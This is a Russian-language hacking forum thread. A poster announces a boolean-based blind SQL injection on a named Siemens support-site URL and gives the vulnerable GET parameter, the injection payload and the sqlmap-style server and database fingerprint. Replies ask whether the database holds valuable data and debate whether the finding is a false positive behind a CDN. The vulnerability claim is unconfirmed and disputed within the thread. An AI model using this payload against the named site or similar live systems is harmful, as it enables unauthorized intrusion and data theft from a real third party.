support.industry.siemens.com sql-injection

[Ul0rix]

Была найдена sql inj на сайте техподдержки продукции Siemens.

https://support.industry.siemens.com/tf/WW/en/posts/download-driver-for-pc-adaptor-usb-a2/114898?page=0

Parameter: dti (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: dti=-1195 OR 6900=6900
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: IBM DB2

 

[YaKaRu1980]

cool

 

[r1z]

nice shot.

 

[onlinechamp]

спасибо, есть ли ценная информация в базе данных? Вам удалось найти точку входа

 

[Кузя]

спасибо, есть ли ценная информация в базе данных? Вам удалось найти точку входа

дб2 не бьётсо)

 

[J3tixProd]

дб2 не бьётсо)

А мне кажется это фолс)

 

[Кузя]

А мне кажется это фолс)

пруф ф студию! ))

 

[J3tixProd]

пруф ф студию! ))

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
IBM DB2 - субд, хотя сервер на аспе и винде, логично предположить шо там MSSQL стоит скорее всего + акамай, а на нём булиан фолсит и ошибка 403. Был аналогичный случай только на другом сайте, отправил им по фану репорт на хакер ван, ответ был следующий: Это фолс позитив, СУБД не MySQL(хотя скульмап выдал именно его) и тоже стоял акамай

 

[Кузя]

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
IBM DB2 - субд, хотя сервер на аспе и винде, логично предположить шо там MSSQL стоит скорее всего + акамай, а на нём булиан фолсит и ошибка 403. Был аналогичный случай только на другом сайте, отправил им по фану репорт на хакер ван, ответ был следующий: Это фолс позитив, СУБД не MySQL(хотя скульмап выдал именно его) и тоже стоял акамай

интереснинько, однако =)

у мну были кейсы, когды стояле именна мускуль и дб2, а таг же дб2 который... принимал данные с мсскл! (wtf зочем, но факт).

потму и спросил)